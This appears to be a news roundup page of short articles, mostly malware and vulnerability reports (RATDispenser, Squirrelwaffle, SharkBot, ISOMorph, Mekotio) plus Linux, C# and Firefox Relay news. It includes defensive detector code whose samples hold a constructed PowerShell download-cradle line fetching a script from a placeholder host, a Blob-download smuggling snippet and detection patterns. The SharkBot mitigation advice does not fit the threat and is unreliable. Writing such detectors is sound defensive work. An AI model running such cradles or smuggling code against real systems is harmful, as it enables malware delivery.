The evasive malware loader dubbed "RATDispenser" by HP Threat Research is responsible for deploying at least eight different malware variants in 2021.

RATDispenser, like most JavaScript malware, gains an initial foothold on the system before launching a secondary malware that then establishes control over the compromised device. According to the researchers, RATDispenser is predominantly used as a dropper, meaning it does not communicate over a network to retrieve the malicious payload.

The malware variants it delivers can be purchased or downloaded on underground marketplaces, and the authors of RATDispenser appear to be operating a malware-as-a-service business model.

How Is the RATDispenser JavaScript Loader Distributing RATs in the Wild?

The RATDispenser infection chain begins with an email carrying a malicious attachment: a JavaScript file (.js) masquerading as a plain text file that supposedly contains information about an order.



The user must open the file for the malware to run. Once running, it decodes itself at runtime and writes a VBScript file to the %TEMP% folder using cmd.exe: the cmd.exe process is passed a chained argument, parts of which are written to the new file with the echo command.

The malware families distributed by RATDispenser include STRRAT and WSHRAT, which together account for 81% of the samples analyzed. STRRAT is a Java RAT first seen in mid-2020 with keylogging and credential-stealing capabilities, while WSHRAT, also known as Houdini, is a VBS RAT that appeared in 2013 and also has typical RAT capabilities.

The most interesting among them is Panda Stealer, a new malware family targeting cryptocurrency wallets that was first seen in April 2021. The least common families are GuLoader and Ratty: the latter is an open-source RAT written in Java, and GuLoader is a downloader known for fetching and running various other RATs.

How to Mitigate against the RATDispenser JavaScript Loader?

Although JavaScript malware is a less common file format than malicious Microsoft Office documents, in several cases it is more poorly detected.

Network defenders can prevent infection by blocking executable email attachment file types, such as JavaScript or VBScript, at their email gateways. They can also interrupt execution of the malware by changing the default file handler for JavaScript files, allowing only digitally signed scripts to run, or disabling Windows Script Host (WSH).

RATDispenser JavaScript Loader Distributing Remote Access Trojan

The MX Linux team recently released MX Linux 21 based on Debian 11 “Bullseye” and running Linux Kernel 5.10 LTS, coming as the first stable release of the “Wildflower” series.

Now, MX Linux has announced the release of another edition called MX Linux 21 AHS, where ‘AHS’ stands for ‘Advanced Hardware Support’, meaning it includes a newer graphics stack tailored for modern systems.

The MX Linux AHS edition ships with the Xfce desktop environment by default, which offers a smooth experience, as Xfce already received significant improvements in the main MX Linux 21 release.

What’s New in MX Linux 21 AHS Edition?

MX Linux 21 AHS comes with Linux Kernel 5.14 and an updated open-source graphics stack tailored for modern systems.



It includes updated mesa, xorg and vulkan drivers for a graphics stack more in line with newer hardware, along with a few recompiled apps that make use of the later kernel. MX Linux AHS will receive updates for the graphics stack over time, so those who do not need the newer graphics stack do not have to use AHS.

Additionally, users of the mainline MX release can enable the ahs repository through mx-repo-manager and update normally while keeping the 5.10 kernel, although they will then also get the later mesa, xorg and vulkan drivers.

How to Download and Install the MX-21 “AHS” Edition?

The MX Linux 21 AHS ISO is now available, either as a direct download or via torrent files.

Note, however, that there is a known issue on older systems, particularly those with Intel-based graphics: suspend-to-RAM, or at least resuming after suspend, may not work. If that feature is important to you and your PC can otherwise use the 5.10 kernel from the main releases, stick with the main releases.

MX Linux 21 AHS Edition: What’s the Difference?

A new malware loader dubbed Squirrelwaffle is spreading through spam campaigns that send malicious emails as replies to existing email chains, a tactic that lures victims into trusting the spam.

According to researchers at Trend Micro, Squirrelwaffle pulls this off by chaining the ProxyLogon and ProxyShell exploits, Microsoft Exchange Server vulnerabilities that were patched this May.

The vulnerabilities enable attackers to bypass ACL controls and gain elevated privileges on the Exchange PowerShell backend, which permits remote code execution.

How Do Hackers Exploit the ProxyLogon and ProxyShell Vulnerabilities in Spam Campaigns?

The server-side request forgery (SSRF) vulnerability gives an attacker access by way of a maliciously crafted web request to an Exchange Server containing an XML payload aimed at the Exchange Web Services (EWS) API endpoint.



This exploit gives an attacker the ability to obtain users' SIDs and emails, and bypasses authentication using specially crafted cookies, which allows an unauthenticated threat actor to execute EWS requests encoded in the XML payload and ultimately perform operations on victims’ mailboxes.

In one of the intrusions the Trend Micro team observed, all users in the affected network received the spam emails, which were sent as seemingly legitimate replies to existing email threads. The emails were written in English even though the campaign targeted the Middle East; other languages were used for other regions, but most were in English.

Interestingly, real account names from the victim’s domain were used as recipient and sender, which increases the likelihood that a recipient will click the link and open the malicious files.

How to Mitigate against the Squirrelwaffle Attack?

The Squirrelwaffle campaigns once again illustrate the tactics hackers use to lure victims into clicking malicious emails and files, and show that an email from a trusted contact is not by itself a sufficient indicator that the link or file it carries is safe.

Therefore, it is important to ensure that the released patches for the Microsoft Exchange Server vulnerabilities ProxyShell and ProxyLogon (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207) have been applied; Microsoft also recommends that users install the more recent (May or July) security updates.

Hackers hijack Email Chains for sending Malicious Spam replies

GitHub will require two-factor authentication (2FA) for maintainers of popular NPM packages, following the recent incident in which the popular NPM package ua-parser-js was found to contain malicious code.

ua-parser-js is used in apps and websites to identify a visitor's device or browser from User-Agent data; a computer with the compromised version installed could allow a remote attacker to obtain sensitive information. GitHub also disclosed a vulnerability that could allow an attacker to publish new versions of any NPM package from an account without proper authorization.

The new 2FA policy will start with a cohort of top NPM packages in the first quarter of 2022, according to a bulletin published by GitHub on November 15.

Major incidents on the registry where NPM accounts were compromised by malicious actors

GitHub also discovered an issue during routine maintenance of a public NPM service: maintenance on the database of the NPM replica generated data that could expose the names of private NPM packages.



This allowed consumers of the replica to identify the names of private packages from records in the public changes feed. The names of all packages in the @owner/package format created before October 20 were exposed between October 21 and October 29, before work started on a fix and on determining the scope of the exposure.

The records containing the private package names have since been removed from the replicate.npmjs.com service, and changes have been made to prevent a recurrence of the issue.

What to Do When You Have an Infected Package Installed or Running on Your System?

If a PC has an infected package installed or running, it should be considered fully compromised; all information and secret keys stored on that computer should be rotated immediately, from a different computer.

GitHub also recommends removing the package, but as the threat actors may have gained total control of the compromised computer, there is no guarantee that removing the package will remove the malicious software.

GitHub to mandate 2FA for maintainers of top NPM packages

Firefox Relay, available at relay.firefox.com, is a service that offers a smart, easy email alias solution to preserve the privacy of your email address.

The service was initially rolled out in a beta phase for early adopters with limited access to features. It is now generally available to all users, with the introduction of a premium plan that unlocks all the features.

An email alias is a temporary email address that forwards all received emails to your actual inbox. It protects your real email address from spammers and helps you manage spam effectively.

How Does Firefox Relay Protect against Spammers?

Firefox Relay, as a privacy-first service, hides your real email address to help protect your identity from spammers. It forwards messages from your alias addresses to your primary email address, and all messages are deleted after they are delivered to you.



You get five email aliases and attachments of up to 150 KB for free. Additionally, labels can now be synced across devices: you can add information such as an account name or description to each alias to make it easier to remember which website you are using it with, and the new syncing means you will see those labels on all your connected devices, including your mobile phone.

Firefox Relay is currently available in the following languages: English, German, Chinese, Dutch, French, Greek, Italian, Portuguese, Swedish, Ukrainian, Slovak, Spanish and Welsh.

How to Get Started with Firefox Relay

First, create a Firefox Account if you do not already have one, then sign in at relay.firefox.com to generate up to five free random email aliases. If you need more than five aliases, you will have to sign up for the Premium service instead.

The Premium service has an introductory price starting at $0.99 per month and is currently available in the United States, Canada, the United Kingdom, Singapore, Malaysia and New Zealand; in Europe it costs 0.99 EUR/1.00 CHF and is available in Austria, Germany, Ireland, Belgium, France, the Netherlands, Spain and Switzerland.

Firefox Relay Email Aliases offer protection against Spammers

The Cleafy TIR team has discovered a new Android banking Trojan, dubbed SharkBot, that can initiate money transfers from compromised devices using an Automatic Transfer System (ATS) technique that bypasses multi-factor authentication mechanisms.

Once installed on the victim's device, SharkBot abuses Android Accessibility Services to obtain sensitive banking data such as credentials, login details and current balance, and to perform gestures on the infected device.

The botnet is currently targeting victims in the UK, Italy and the US, mainly users of banking applications and cryptocurrency exchanges.

How Does the SharkBot Trojan Steal Personal Banking Information?

SharkBot can perform overlay attacks to steal personal banking login credentials and credit card information, and can also intercept legitimate banking communications sent via SMS.



It is also capable of performing Automatic Transfer System (ATS) attacks on the infected device, an advanced technique that enables attackers to auto-fill form fields in legitimate banking apps and initiate transfers from the compromised device.

The Trojan has a very low detection rate by anti-virus solutions, as it implements multiple anti-analysis techniques, including an obfuscation routine and a domain generation algorithm (DGA) for its network communication.

SharkBot also attempts to bypass behavioural detection countermeasures, such as biometrics, put in place by multiple financial services, again by abusing Android Accessibility Services.

How to Mitigate against the SharkBot Banking Trojan?

SharkBot is installed on users' devices either by side-loading or through social engineering schemes.

Organizations are therefore advised to be vigilant about this sort of attack, to make sure that file permissions are not granted to the "Everyone" group, so as to limit exposure to further attacks, and to always check that the permissions on running databases are locked down.

New Generation of Android Trojan bypassing multi-factor authentication

HTML smuggling is a technique for delivering a first-stage dropper that is fast gaining notoriety; it was recently employed in the spear-phishing campaign carried out by the Nobelium group.

According to Menlo Security, a malware campaign dubbed ISOMorph, which the team has been monitoring, leverages HTML smuggling to deliver malicious files to victims’ endpoints while evading security solutions such as sandboxes and legacy proxies.

The ISOMorph attack is multi-staged and is capable of checking for and disabling various anti-virus programs running on the endpoint.

How ISOMorph Uses HTML Smuggling to Deliver Malicious Files?

The ISOMorph attack uses HTML smuggling to deliver its payload to the endpoint because the browser is one of the weakest links, with no security solution in place to block the payload there. HTML smuggling delivers malicious files while effectively bypassing network security solutions, including legacy proxies, sandboxes and firewalls.



Attackers use this technique to construct the malicious payload programmatically on the HTML page using JavaScript, rather than making an HTTP request to fetch a resource from a web server. It is neither a bug nor a design flaw in browser technologies; developers most often use the same technique to optimize file downloads.

The threat actors behind ISOMorph use JavaScript code to construct the payload in the browser: they create an “a” element, set its HREF to the blob, and programmatically click it, which triggers the download to the endpoint.

Once the payload is downloaded to the endpoint, however, the user still has to open it for the malicious code to execute.
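Because the payload is assembled client-side, the pattern described above can be spotted statically in an HTML attachment before anyone opens it. The following is an added example, not code from Menlo Security or from the article: a small triage scanner that scores an HTML file on the indicators of that pattern (long inline base64 literal, Blob construction, object URL, download attribute, programmatic click). The indicator names, weights and threshold are this example's own choices, and both input documents are constructed.

```javascript
// Added example: static triage of HTML attachments for the browser-side
// "build a Blob and click a download link" pattern. Indicator set, weights
// and THRESHOLD are this example's own tuning choices, not a standard.
const INDICATORS = [
  { name: 'blob-constructor',     re: /new\s+Blob\s*\(/i,                      weight: 2 },
  { name: 'object-url',           re: /URL\.createObjectURL\s*\(/i,             weight: 2 },
  { name: 'legacy-save-blob',     re: /msSaveOrOpenBlob\s*\(/i,                 weight: 2 },
  { name: 'base64-decode',        re: /\batob\s*\(/i,                           weight: 1 },
  { name: 'download-attribute',   re: /\.download\s*=|\bdownload\s*=\s*["']/i,  weight: 1 },
  { name: 'programmatic-click',   re: /\.click\s*\(\s*\)/i,                     weight: 1 },
  // A very long base64 string literal is where the smuggled file itself lives.
  { name: 'large-base64-literal', re: /["'][A-Za-z0-9+\/]{256,}={0,2}["']/,     weight: 3 },
];
const THRESHOLD = 5;

// Returns which indicators matched, the weighted score, and whether the
// document should be flagged for analyst review.
function scanHtmlForSmuggling(html) {
  const matched = INDICATORS.filter(ind => ind.re.test(html));
  const score = matched.reduce((sum, ind) => sum + ind.weight, 0);
  return { hits: matched.map(ind => ind.name), score, flagged: score >= THRESHOLD };
}

// Constructed sample documents. The "payload" is a placeholder of repeated
// 'A' characters, not a real file; it only needs to look like a long literal.
const PLACEHOLDER_B64 = 'A'.repeat(300);
const SMUGGLING_SAMPLE = `
<html><body><p>Your order details are attached.</p>
<script>
  var blob = new Blob([atob("${PLACEHOLDER_B64}")], { type: "application/octet-stream" });
  var a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = "order.iso";
  a.click();
</script></body></html>`;

const BENIGN_SAMPLE = `
<html><body><p>Your order has shipped.</p>
<a href="https://example.invalid/order/1234">Track your order</a>
</body></html>`;

console.log(scanHtmlForSmuggling(SMUGGLING_SAMPLE)); // flagged: true
console.log(scanHtmlForSmuggling(BENIGN_SAMPLE));    // flagged: false
```

The same check fits at a mail gateway or in a sandbox pre-filter, where a high score routes the attachment to deeper analysis rather than relying on the browser being the last line of defence.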

How to Mitigate against the ISOMorph Attack?

HTML smuggling is gaining popularity because attackers can easily get their payloads to the endpoint while bypassing network security, inspection and analysis tools.

As attackers increasingly adopt techniques such as HTML smuggling to get their payloads to the endpoint for initial access, knowing the initial access methods is critical to a strong response strategy.

ISOMorph Attack leverages HTML Smuggling to deliver malware

Microsoft has announced the release of C# 10 as part of .NET 6 and Visual Studio 2022, giving the object-oriented, type-safe programming language capabilities that make code quicker and more expressive.

According to the company, C# produces an error when a value that has not been definitely assigned is used; C# 10 understands the code better and produces fewer spurious errors, so users will see fewer errors and warnings about null references.

Also, C# 10 adds extended property patterns that make it easier to access nested property values in patterns.

What's New in C# 10 Programming Language?

C# 10 brings improvements to structs that offer better parity with classes; the new features include field initializers, parameterless constructors, record structs and with expressions.



Before C# 10, every struct had an implicit public parameterless constructor that set its fields to their defaults, and it was an error to declare a parameterless constructor on a struct. With C# 10 you can include a parameterless struct constructor; if you do not, the implicit parameterless constructor that sets all fields to their defaults is still provided.

In C# 10 you can also specify an explicit return type on a lambda expression, just as on a method or a local function, with the return type placed right before the parameters. Lambdas are invoked differently from methods and local functions, however, so attributes have no effect when the lambda is invoked.

C# 10 has a number of other improvements across the language, with some of these helping to make C# work in the way you expect.

How to Get Started with C# 10?

C# 10 is part of the .NET 6 software development framework and the Visual Studio 2022 IDE, and C# programmers using this IDE will benefit from several improvements in this release.

Get started by downloading Visual Studio 2022 for Windows, which is now available as a 64-bit application, so you can edit, run and debug the biggest and most complex solutions without running out of memory.

What's New in Microsoft’s C# 10 Programming Language?

Fedora 35 stable version was recently released with a few notable improvements, including the addition of Gnome 41 and Linux Kernel 5.14, along with the completion of the transition to PipeWire.

Fedora is known for shipping the latest desktop environments, and this release certainly does not depart from that norm. Fedora 35 includes KDE Plasma, Xfce and other desktop environments, as well as images for ARM devices.

The different desktop variants of Fedora 35, including Fedora Workstation, Fedora KDE and the others, also use Btrfs as the default filesystem.

What's New in Fedora 35?

Fedora 35's inclusion of the recently released GNOME 41 means it also gains the new Connections app and a significantly improved software center, along with multitasking controls in Fedora 35 Workstation.



On the downside, Fedora 35 opted for Plasma 5.22 instead of the recently released Plasma 5.23. Though only a minor upgrade, Plasma 5.22 includes the adaptive transparency feature and improved system settings.

The new Linux 5.14 kernel is great news for those on ARM-based systems, as it includes many ARM-specific improvements. ARM computer users will also benefit from many of the other improvements in Linux 5.14, mostly related to GPUs.

What's more, you also get Flatpak app support out of the box to install software easily, and Fedora Kinoite, which is based on rpm-ostree technology, features the KDE Plasma desktop.

How to Get Started with Fedora 35?

If you are a new user and want to try Fedora 35, you can download the ISO image from the official page, where images of all editions and variants are available.

You can also check out the full list of changes in Fedora 35, which can be found in the changelist or in the official announcement.

What's New in Fedora 35 Release?

Mekotio is an old modular banking Trojan that has targeted Latin American countries and has recently made a comeback with stealthy and evasive techniques.

According to Check Point researchers, over 100 attacks using the new techniques have been detected in recent weeks. The infection starts with a phishing email that carries either a link to a zip file or a zip archive as an attachment.

The main characteristic of banking Trojans such as Mekotio is their modular design, which gives attackers the ability to change just a small part of the whole to avoid detection.

How Mekotio's New Attack Flow Is Carried Out

The infection starts with a phishing email containing a link to a zip attachment, which lures the victim into downloading and extracting the zip content.



If the victim clicks on the extracted content, a malicious batch script executes; it runs a “PowerShell download cradle” that downloads a PowerShell script and runs it in memory.

The PowerShell script checks whether the target is located in Latin America and makes sure it is not running in a virtual machine. It then sets up persistence in the victim’s operating system by downloading a secondary zip archive.
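Both staging steps on this page, RATDispenser's script host driving cmd.exe to echo a VBScript into %TEMP% (described earlier) and Mekotio's batch script launching a PowerShell download cradle, leave a parent/child process relationship with a telltale command line. The following is an added example, not code from HP Threat Research, Check Point or the article: it triages constructed process-creation events with one rule for each behaviour. The "ParentImage|Image|CommandLine" event format, the rule names and the sample events are this example's own assumptions, not any product's log format.

```javascript
// Added example: rule-based triage of process-creation events for the two
// script-host staging behaviours described on this page. Event format and
// rule names are constructed conventions for this example only.
function parseEvent(line) {
  const [parent, image, ...rest] = line.split('|');
  return {
    parent: parent.trim().toLowerCase(),
    image: image.trim().toLowerCase(),
    cmd: rest.join('|').trim(),   // command lines may themselves contain '|'
  };
}

const SCRIPT_HOSTS = new Set(['wscript.exe', 'cscript.exe']);

// RATDispenser-style staging: a script host spawns cmd.exe whose chained
// command line echoes fragments into a .vbs file under %TEMP%.
function isEchoToTempVbs(ev) {
  if (!SCRIPT_HOSTS.has(ev.parent) || ev.image !== 'cmd.exe') return false;
  return /\becho\b[^&|]*>>?\s*"?%temp%\\[^"\s]*\.vbs/i.test(ev.cmd);
}

// Mekotio-style staging: cmd.exe (the batch script) spawns PowerShell with
// an in-memory download cradle, i.e. a download and an invoke in one line.
function isPowerShellDownloadCradle(ev) {
  if (ev.image !== 'powershell.exe') return false;
  const downloads = /Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b/i.test(ev.cmd);
  const invokes = /\bIEX\b|Invoke-Expression/i.test(ev.cmd);
  return downloads && invokes;
}

// Returns one result per event with the list of rules that fired.
function triage(lines) {
  return lines.map(parseEvent).map(ev => ({
    image: ev.image,
    alerts: [
      isEchoToTempVbs(ev) ? 'script-host-echo-to-temp-vbs' : null,
      isPowerShellDownloadCradle(ev) ? 'powershell-download-cradle' : null,
    ].filter(Boolean),
  }));
}

// Constructed events, not captured telemetry; paths and URLs are placeholders.
const SAMPLE_EVENTS = [
  'explorer.exe|wscript.exe|wscript.exe "C:\\Users\\u\\Downloads\\order_details.txt.js"',
  'wscript.exe|cmd.exe|cmd.exe /c echo dim a >> %TEMP%\\stage.vbs & echo a=1 >> %TEMP%\\stage.vbs & wscript %TEMP%\\stage.vbs',
  'cmd.exe|powershell.exe|powershell.exe -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/s.ps1\')"',
  'explorer.exe|powershell.exe|powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1',
];

for (const r of triage(SAMPLE_EVENTS)) {
  console.log(r.image.padEnd(16), r.alerts.length ? r.alerts.join(',') : '-');
}
```

The fourth sample, an administrator's scheduled PowerShell script, stays quiet because the cradle rule requires both a download and an invoke in the same command line, which keeps the rule from firing on ordinary script execution.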

Check Point researchers believe that the main cybercrime groups behind the new campaigns operate from Brazil and that they collaborated with Spanish gangs, which were recently arrested, to distribute the malware. The arrests did not stop the main cybercrime groups; they only stopped the activity of the Spanish gangs.

How to Mitigate against Banking Trojans like Mekotio?

Threat actors continue to adopt evasive techniques to avoid detection, and the social engineering tricks that lure victims into giving up their online banking data are becoming more pervasive. The most important advice, therefore, is for users not to click on links from any unknown source.

Also beware of lookalike domains, spelling errors in emails or site addresses, and unfamiliar email senders, especially when they prompt for unusual actions.

Mekotio Banking Trojan Returns with Stealthy and Evasive Techniques